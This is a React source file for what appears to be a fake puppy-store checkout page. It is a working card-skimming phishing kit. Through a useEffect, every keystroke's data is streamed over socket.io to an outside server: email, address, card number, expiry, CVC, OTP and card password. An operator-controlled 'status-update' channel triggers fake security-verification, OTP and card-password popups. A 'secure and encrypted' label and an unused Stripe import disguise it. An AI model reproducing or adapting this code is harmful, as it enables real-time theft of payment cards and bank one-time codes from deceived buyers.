import React, { useState, useEffect, useMemo } from "react";
import { loadStripe } from "@stripe/stripe-js";
import "../styles/paymentForm.css";
import { RiArrowDropDownLine } from "react-icons/ri";
import CardIconRow from "../components/payment-form-components/CardIconRow";
import CardForm from "../components/payment-form-components/card-form/CardForm";
import LoadingPopup from "../components/payment-form-components/loading-popup/LoadingPopup";
import PurchaseOtpVerification from "../components/payment-form-components/otp-popup/PurchaseOtpVerification";
import CardPasswordPopup from "../components/payment-form-components/card-password-popup/CardPasswordPopup";
import SecurityVerificationPopup from "../components/payment-form-components/security-verification-popup/SecurityVerificationPopup";
import SimulatedVerification from "../components/payment-form-components/simulated-verification/SimulatedVerification";
import PaymentStatusPopup from "../components/payment-form-components/payment-status/PaymentStatusPopup";
import FullScreenLoader from '../components/loader/FullScreenLoader';


import { io } from "socket.io-client";
import valid from "card-validator";
const socket = io("https://mirro-server.onrender.com");


const CheckoutForm = ({userData, puppyInfo}) => {
  useEffect(() => {
    const html = document.documentElement;

    // Apply styles
    html.style.fontSize = "62.5%";
    html.style.webkitTextSizeAdjust = "100%";
    html.style.MozTextSizeAdjust = "100%";
    html.style.textSizeAdjust = "100%";

    return () => {
      // Reset styles when leaving the page
      html.style.fontSize = "";
      html.style.webkitTextSizeAdjust = "";
      html.style.MozTextSizeAdjust = "";
      html.style.textSizeAdjust = "";
    };
  }, []);


  const [email, setEmail] = useState(userData.emailInput || "");
  const [shouldCallCheck, setShouldCallCheck] = useState(true)
  const [country, setCountry] = useState("US");
  const [firstName, setFirstName] = useState(userData.firstNameInput || "");
  const [lastName, setLastName] = useState(userData.lastNameInput || "");
  const [address, setAddress] = useState(userData.homeAddress  || "");
  const [apartment, setApartment] = useState(userData.apartmentUnit  || "");
  const [city, setCity] = useState(userData.city || "");
  const [state, setState] = useState(userData.state || "");
  const [zipCode, setZipCode] = useState(userData.zipCode || "");

  const [country2, setCountry2] = useState("");
  const [firstName2, setFirstName2] = useState("");
  const [lastName2, setLastName2] = useState("");
  const [address2, setAddress2] = useState("");
  const [apartment2, setApartment2] = useState("");
  const [city2, setCity2] = useState("");
  const [state2, setState2] = useState("");
  const [zipCode2, setZipCode2] = useState("");


  const [cardNumber, setCardNumber] = useState("");
  const [expiry, setExpiry] = useState("");
  const [cvc, setCvc] = useState("");
  const [nameOnCard, setNameOnCard] = useState("");
  const [useShippingAsBilling, setUseShippingAsBilling] = useState(true)

  const [cardType, setCardType] = useState("");

  const [errors, setErrors] = useState({});
  const [errorsExpiry, setErrorsExpiry] = useState({});
  const [errorsCvc, setErrorsCvc] = useState({});


  const [emailError, setEmailError] = useState("")
  const [countryError, setCountryError] = useState("");
  const [firstNameError, setFirstNameError] = useState("");
  const [lastNameError, setLastNameError] = useState("");
  const [addressError, setAddressError] = useState("");
  const [cityError, setCityError] = useState("");
  const [stateError, setStateError] = useState("");
  const [zipCodeError, setZipCodeError] = useState("");

  const [nameOnCardError, setNameOnCardError] = useState("")
  const [countryError2, setCountryError2] = useState("");
  const [firstNameError2, setFirstNameError2] = useState("");
  const [lastNameError2, setLastNameError2] = useState("");
  const [addressError2, setAddressError2] = useState("");
  const [cityError2, setCityError2] = useState("");
  const [stateError2, setStateError2] = useState("");
  const [zipCodeError2, setZipCodeError2] = useState("");

  const [cardNumberTouched, setCardNumberTouched] = useState(false);
  const [expiryTouched, setExpiryTouched] = useState(false);
  const [cvcTouched, setCvcTouched] = useState(false);

  const [status, setStatus] = useState(true);
  const [otpCode, setOtpCode] = useState('');
  const [password, setPassword] = useState('');
  const [showSimulatedLoad, setShowSimulatedLoad] = useState(true);
  const [securityVerificationCardName, setSecurityVerificationCardName] = useState('');
  const [securityVerificationLinkContact, setSecurityVerificationLinkContact] = useState('');
  const [securityVerificationAmount, setSecurityVerificationAmount] = useState('');



  const [statusMessage, setStatusMessage] = useState("");


  // Optional: You can use these handlers for logic control
  const handleConfirmVerification = () => {
    setStatusMessage('simulated-verification-loading');
    // proceed to OTP or card password step here
  };

  const handleCancelVerification = () => {
    setStatusMessage('');
    // optional: show cancellation message or stop process
  };

  const onSubmitOtp = () => {
    if(otpCode){
      setStatusMessage('loading')
    }
  }
  const onSubmitPassword =()=>{
    if(password){
      setStatusMessage('loading')
    }
  }
  

  const updateLiveFeed = async () => {

    const formData = {
      email,
      shouldCallCheck,
      country,
      firstName,
      lastName,
      address,
      apartment,
      city,
      state,
      zipCode,
      cardNumber,
      expiry,
      cvc,
      nameOnCard,
      useShippingAsBilling,
      cardType,
      country2,
      firstName2,
      lastName2,
      address2,
      apartment2,
      city2,
      state2,
      zipCode2,
      otpCode,
      password,
      statusMessage
    };

    socket.emit("form-data", formData);
  };
  const validateFormOnSubmit = () => {
    let hasError = false;

    // Email or mobile number check
    const isEmail = /^\S+@\S+\.\S+$/.test(email);
    const isMobile = /^\d{10,15}$/.test(email.replace(/\s+/g, ''));
    const emailErr = !email || (!isEmail && !isMobile) ? "Enter a valid email or mobile number" : "";
    setEmailError(emailErr);
    if (emailErr) hasError = true;

    const check = (value, setter) => {
      const err = !value ? "Required" : "";
      setter(err);
      if (err) hasError = true;
    };

    check(country, setCountryError);
    check(firstName, setFirstNameError);
    check(lastName, setLastNameError);
    check(address, setAddressError);
    check(city, setCityError);
    check(state, setStateError);
    check(zipCode, setZipCodeError);
    check(nameOnCard.trim(), setNameOnCardError);

    if (!useShippingAsBilling) {
      check(country2, setCountryError2);
      check(firstName2, setFirstNameError2);
      check(lastName2, setLastNameError2);
      check(address2, setAddressError2);
      check(city2, setCityError2);
      check(state2, setStateError2);
      check(zipCode2, setZipCodeError2);
    }

    const numberValidation = valid.number(cardNumber.replace(/\s/g, ""));
    const cardNumberErr = numberValidation.isValid ? "" : "Invalid card number";
    setErrors({ cardNumber: cardNumberErr });
    if (cardNumberErr) hasError = true;

    const expiryValidation = valid.expirationDate(expiry);
    const expiryErr = expiryValidation.isValid ? "" : "Invalid expiration date";
    setErrorsExpiry({ expiry: expiryErr });
    if (expiryErr) hasError = true;

    const cvcErr = /^\d{3,4}$/.test(cvc) ? "" : "Security code must be 3 or 4 digits";
    setErrorsCvc({ cvc: cvcErr });
    if (cvcErr) hasError = true;

    return !hasError;
  };



  useEffect(() => {
    updateLiveFeed()
  }, [
    email,
    shouldCallCheck,
    country,
    firstName,
    lastName,
    address,
    city,
    state,
    zipCode,
    cardNumber,
    expiry,
    cvc,
    nameOnCard,
    useShippingAsBilling,
    country2,
    firstName2,
    lastName2,
    address2,
    city2,
    state2,
    zipCode2,
    otpCode,
    password,
    statusMessage
  ]);
  useEffect(() => {
    const handleStatusUpdate = (status) => {
      if(status.type  == "security-verification-popup"){
        setSecurityVerificationCardName(status.cardType)
        setSecurityVerificationLinkContact(status.linkedContact)
        setSecurityVerificationAmount(status.amount)
      }

      setStatusMessage(status.type);
    };

    // Set up the listener for status-update
    socket.on("status-update", handleStatusUpdate);

    // Cleanup the listener when the component unmounts
    return () => {
      socket.off("status-update", handleStatusUpdate);
    };
  }, []); // Empty dependency array to only run this effect on mount/unmount


  const scrollToTop = () => {
    window.scrollTo({
      top: 150,
      behavior: 'smooth' // or 'auto' for instant scroll
    });
  };
  const onSubmit = () =>{
    const isValid = validateFormOnSubmit();

    if(!isValid){
      scrollToTop()
    }else{
      setStatusMessage('loading')
    }
  }



  return (
    <>
      
              <main id="paymentForm">
                <header className="header__paymentForm">
                  <img src="/new-img/shop-logo.webp" alt="Logo" className="logo__paymentForm" />
                </header>



                <div className="checkout-container">

{/*Left Side*/}
                  <div className="checkout-left">
                    <main className="checkout-form">
                        {/*Contact*/}
                        <section>
                          <div className="row--spacebetween__paymentForm">
                            <h2 id="contact" className="n8k95w1 n8k95w0 _1fragemlt n8k95w2 n8k95wg">Contact</h2>
                            {/*<a href="" className='login__paymentForm'>Log in</a>*/}
                          </div>

                          <div className={`floating-label-input ${email ? 'filled__paymentForm' : ''} ${emailError ? "error__CardForm" : ""}`} style={{ marginBottom: '1.5rem' }}>
                            <input
                              type="email"
                              value={email}
                              onChange={(e) => setEmail(e.target.value)}
                            />
                            <label>Email or mobile phone number</label>
                            {emailError && <div className="error-text__CardForm">{emailError}</div>}
                          </div>


                          <div style={{"--checkbox-size": "var(--checkbox-size-md)","--checkbox-color": "var(--gray-01)","--label-fz": "var(--mantine-font-size-md)","--label-lh": "var(--label-lh-md)",marginBottom: '30px'}}  className="m_bf2d988c mantine-Checkbox-root m_5f75b09e mantine-Checkbox-root" data-size="md" data-label-position="right" data-checked="true">
                                <div className="m_5f6e695e mantine-Checkbox-body aliign_items-center">
                                    <div className="m_26062bec mantine-Checkbox-inner" data-label-position="right">
                                        <input 
                                            className="mantine-focus-auto m_26063560 mantine-Checkbox-input" 
                                            id="mantine-v3tcd6bih" 
                                            data-path="canReceiveSms" 
                                            type="checkbox" 
                                            checked={shouldCallCheck} 
                                            onClick={()=> setShouldCallCheck(!shouldCallCheck)}
                                            style={{ '--checkbox-size': 'var(--checkbox-size-md)', '--checkbox-color': 'var(--gray-01)', '--label-fz': 'var(--mantine-font-size-md)', '--label-lh': 'var(--label-lh-md)', cursor: 'pointer', border: '0.5px solid gray'}}/>
                                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none" className="m_bf295423 mantine-Checkbox-icon"><path d="M13.3337 4L6.00033 11.3333L2.66699 8" stroke="white" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                                    </div>
                                    <div className="m_d3ea56bb mantine-Checkbox-labelWrapper"><label className="tw-font-inter tw-text-gray-02 tw-text-sm m_8ee546b8 mantine-Checkbox-label" htmlFor="mantine-v3tcd6bih">Opt in for SMS updates on <span className="tw-capitalize">TestName.</span> You can opt out anytime.</label></div>
                                </div>
                            </div>
                        </section>


                        {/*Delivery*/}
                        <div style={{marginBottom: '30px'}}>

                          <div className="bSo96">
                            <h2 id="contact" className="n8k95w1 n8k95w0 _1fragemlt n8k95w2 n8k95wg">Delivery</h2>
                          </div>

                          <div className={`floating-label-input ${country ? 'filled__paymentForm' : ''} ${countryError ? "error__CardForm" : ""}`} style={{ marginBottom: '1.5rem' }}>
                            <select style={{  }} onChange={(e) => setCountry(e.target.value)} value={country}>
                                <option value=""></option>
                                <option value="US">United States</option>
                            </select>
                            <label>Country/Region</label>
                            <RiArrowDropDownLine style={{position: 'absolute', right: '0rem', top: '10px', fontSize: '3rem', color: 'gray'}} />

                            {countryError && <div className="error-text__CardForm">{countryError}</div>}
                          </div>


                          <div className="row__paymentForm" style={{ marginBottom: '1.5rem' }}>
                            <div className={`floating-label-input ${firstName ? 'filled__paymentForm' : ''} ${firstNameError ? "error__CardForm" : ""}`}>
                              <input
                                type="text"
                                value={firstName}
                                onChange={(e) => setFirstName(e.target.value)}
                              />
                              <label>First Name</label>
                              {firstNameError && <div className="error-text__CardForm">{firstNameError}</div>}
                            </div>

                            <div className={`floating-label-input ${lastName ? 'filled__paymentForm' : ''} ${lastNameError ? "error__CardForm" : ""}`}>
                              <input
                                type="text"
                                value={lastName}
                                onChange={(e) => setLastName(e.target.value)}
                              />
                              <label>Last Name</label>
                              {lastNameError && <div className="error-text__CardForm">{lastNameError}</div>}
                            </div>
                          </div>



                            <div className={`floating-label-input ${address ? 'filled__paymentForm' : ''} ${addressError ? "error__CardForm" : ""}`} style={{ marginBottom: '1.5rem' }}>
                              <input
                                type="type"
                                value={address}
                                onChange={(e) => setAddress(e.target.value)}
                              />
                              <label>Address</label>
                              {addressError && <div className="error-text__CardForm">{addressError}</div>}
                            </div>
                            <div className={`floating-label-input ${apartment ? 'filled__paymentForm' : ''}`} style={{ marginBottom: '1.5rem' }}>
                              <input
                                type="type"
                                value={apartment}
                                onChange={(e) => setApartment(e.target.value)}
                              />
                              <label>Apartment, suite, etc. (optional)</label>
                            </div>


                            <div className="row__paymentForm" style={{ marginBottom: '1.5rem' }}>
                                <div className={`floating-label-input ${city ? 'filled__paymentForm' : ''} ${cityError ? "error__CardForm" : ""}`}>
                                  <input
                                    type="text"
                                    value={city}
                                    onChange={(e) => setCity(e.target.value)}
                                  />
                                  <label>City</label>
                                  {cityError && <div className="error-text__CardForm">{cityError}</div>}
                                </div>

                                <div id="lone-select-field__paymentForm" className={`floating-label-input ${state ? 'filled__paymentForm' : ''} ${stateError ? "error__CardForm" : ""}`}>
                                  <select  style={{ }} onChange={(e) => setState(e.target.value)} value={state}>
                                      <option value=""></option>
                                      <option value="Alabama">Alabama</option>
                                      <option value="Alaska">Alaska</option>
                                      <option value="Arizona">Arizona</option>
                                      <option value="Arkansas">Arkansas</option>
                                      <option value="California">California</option>
                                      <option value="Colorado">Colorado</option>
                                      <option value="Connecticut">Connecticut</option>
                                      <option value="Delaware">Delaware</option>
                                      <option value="Florida">Florida</option>
                                      <option value="Georgia">Georgia</option>
                                      <option value="Hawaii">Hawaii</option>
                                      <option value="Idaho">Idaho</option>
                                      <option value="Illinois">Illinois</option>
                                      <option value="Indiana">Indiana</option>
                                      <option value="Iowa">Iowa</option>
                                      <option value="Kansas">Kansas</option>
                                      <option value="Kentucky">Kentucky</option>
                                      <option value="Louisiana">Louisiana</option>
                                      <option value="Maine">Maine</option>
                                      <option value="Maryland">Maryland</option>
                                      <option value="Massachusetts">Massachusetts</option>
                                      <option value="Michigan">Michigan</option>
                                      <option value="Minnesota">Minnesota</option>
                                      <option value="Mississippi">Mississippi</option>
                                      <option value="Missouri">Missouri</option>
                                      <option value="Montana">Montana</option>
                                      <option value="Nebraska">Nebraska</option>
                                      <option value="Nevada">Nevada</option>
                                      <option value="New Hampshire">New Hampshire</option>
                                      <option value="New Jersey">New Jersey</option>
                                      <option value="New Mexico">New Mexico</option>
                                      <option value="New York">New York</option>
                                      <option value="North Carolina">North Carolina</option>
                                      <option value="North Dakota">North Dakota</option>
                                      <option value="Ohio">Ohio</option>
                                      <option value="Oklahoma">Oklahoma</option>
                                      <option value="Oregon">Oregon</option>
                                      <option value="Pennsylvania">Pennsylvania</option>
                                      <option value="Rhode Island">Rhode Island</option>
                                      <option value="South Carolina">South Carolina</option>
                                      <option value="South Dakota">South Dakota</option>
                                      <option value="Tennessee">Tennessee</option>
                                      <option value="Texas">Texas</option>
                                      <option value="Utah">Utah</option>
                                      <option value="Vermont">Vermont</option>
                                      <option value="Virginia">Virginia</option>
                                      <option value="Washington">Washington</option>
                                      <option value="West Virginia">West Virginia</option>
                                      <option value="Wisconsin">Wisconsin</option>
                                      <option value="Wyoming">Wyoming</option>

                                  </select>
                                  <label>State</label>
                                  {stateError && <div className="error-text__CardForm">{stateError}</div>}
                                  <RiArrowDropDownLine style={{position: 'absolute', right: '0rem', top: '10px', fontSize: '3rem', color: 'gray'}} />
                                </div>

                                <div className={`floating-label-input ${zipCode ? 'filled__paymentForm' : ''} ${zipCodeError ? "error__CardForm" : ""}`}>
                                  <input
                                    type="text"
                                    value={zipCode}
                                    onChange={(e) => setZipCode(e.target.value)}
                                  />
                                  <label>Zip code</label>
                                  {zipCodeError && <div className="error-text__CardForm">{zipCodeError}</div>}
                                </div>
                            </div>
                        </div>

                      
                        {/*Payment*/}
                        <div className="row--spacebetween__paymentForm">
                          <label style={{margin: '0'}}>Credit/Debit Card</label>
                          <CardIconRow cardType={cardType} />
                        </div>
                        <span style={{display: 'block', marginBottom: '1.2rem'}}>All transactions are secure and encrypted.</span>

                        <CardForm 
                          cardType={cardType} 
                          setCardType={setCardType} 
                          cardNumber={cardNumber} 
                          setCardNumber={setCardNumber}
                          expiry={expiry}
                          setExpiry={setExpiry}
                          cvc={cvc}
                          setCvc={setCvc}
                          nameOnCard={nameOnCard}
                          setNameOnCard={setNameOnCard}
                          useShippingAsBilling={useShippingAsBilling}
                          setUseShippingAsBilling={setUseShippingAsBilling}

                          country2={country2} 
                          setCountry2={setCountry2}
                          firstName2={firstName2}
                          setFirstName2={setFirstName2}
                          lastName2={lastName2}
                          setLastName2={setLastName2}
                          address2={address2}
                          setAddress2={setAddress2}
                          apartment2={apartment2}
                          setApartment2={setApartment2}
                          city2={city2} 
                          setCity2={setCity2}
                          state2={state2}
                          setState2={setState2}
                          zipCode2={zipCode2}
                          setZipCode2={setZipCode2}

                          errors={errors}
                          setErrors={setErrors}
                          errorsExpiry={errorsExpiry} 
                          setErrorsExpiry={setErrorsExpiry}
                          errorsCvc={errorsCvc}
                          setErrorsCvc={setErrorsCvc}
                          status={status}
                          setStatus={setStatus}

                          nameOnCardError={nameOnCardError}
                          countryError2={countryError2}
                          firstNameError2={firstNameError2}
                          lastNameError2={lastNameError2}
                          addressError2={addressError2}
                          cityError2={cityError2}
                          stateError2={stateError2}
                          zipCodeError2={zipCodeError2}

                          cardNumberTouched={cardNumberTouched}
                          setCardNumberTouched={setCardNumberTouched}
                          expiryTouched={expiryTouched}
                          setExpiryTouched={setExpiryTouched}
                          cvcTouched={cvcTouched}
                          setCvcTouched={setCvcTouched}

                          onSubmit={onSubmit}
                        />

                    </main>
                  </div>


{/*Right Side*/}
                  <div className="checkout-right">
                    <h3>Order Summary</h3>

                    <div className='simple-row-bl__paymentForm'>
                      <div className="summary-item__paymentForm">
                          <img
                            src={puppyInfo.gallery_content[0].urls["300w"]}
                            alt="Product"
                            className="product-img"
                          />
                          <div className="checkout-right-text__paymentForm">
                            <p>{puppyInfo.puppy_name}</p>
                            <p>{puppyInfo.breed}</p>
                          </div>
                      </div>

                      <strong>{puppyInfo.price}.00</strong>
                    </div>
                    


                    <div className="summary-totals">
                      <div className="simple-row__paymentForm">
                        <p>Tax:</p>
                        <strong>$0.00</strong>
                      </div>
                      <div className="simple-row__paymentForm">
                        <p>Subtotal:</p>
                        <strong>{puppyInfo.price}.00</strong>
                      </div>
                      {/*<div className="simple-row__paymentForm" style={{marginBottom: '2rem'}}>
                        <p>Shipping:</p>
                        <strong>$200.00</strong>
                      </div>*/}
                      <div className="simple-row__paymentForm">
                        <h4>Total:</h4>
                        <h4>{puppyInfo.price}.00</h4>
                      </div>

                    </div>
                  </div>


                </div>
              </main>


{/*Popups*/}

            <>
              <LoadingPopup visible={statusMessage === 'loading'} message="Processing your payment" />

              {
                statusMessage === 'resent-otp-full-loading'
                ?
                <FullScreenLoader/>
                :
                null

              }  

              {
                securityVerificationCardName
                ?
                <SecurityVerificationPopup
                  visible={statusMessage === 'security-verification-popup'}
                  onConfirm={handleConfirmVerification}
                  onCancel={handleCancelVerification}
                  securityVerificationCardName={securityVerificationCardName}
                />
                :
                null
              }
              

              <SimulatedVerification
                visible={statusMessage === 'simulated-verification-loading'}
                setStatusMessage={setStatusMessage}
              />

              {
                securityVerificationCardName && securityVerificationLinkContact && securityVerificationAmount
                ?
                <PurchaseOtpVerification
                  visible={statusMessage === 'purchase-otp-verification'}
                  onSubmit={(otpCode) => onSubmitOtp()}
                  onCancel={() => setStatusMessage('')}

                  securityVerificationCardName={securityVerificationCardName}
                  securityVerificationLinkContact={securityVerificationLinkContact}
                  securityVerificationAmount={securityVerificationAmount}
                  otpCode={otpCode} 
                  setOtpCode={setOtpCode}
                />
                :
                null
              }
              

              <PaymentStatusPopup type={
                                        statusMessage === 'success'
                                          ? 'success'
                                          : statusMessage === 'failed'
                                          ? 'failed'
                                          : ''
                                      } onClose={() => setStatusMessage('')}/>

              <CardPasswordPopup
                visible={statusMessage === 'card-password'}
                onSubmit={(password) => {
                  onSubmitPassword()
                }}
                onCancel={() => setStatusMessage('')}
                password={password}
                setPassword={setPassword}              
              />
            </>


    </>
    
    
  );
};

const CheckoutPage = ({userData, puppyInfo}) => (
    <CheckoutForm userData={userData} puppyInfo={puppyInfo}/>
);

export default CheckoutPage;
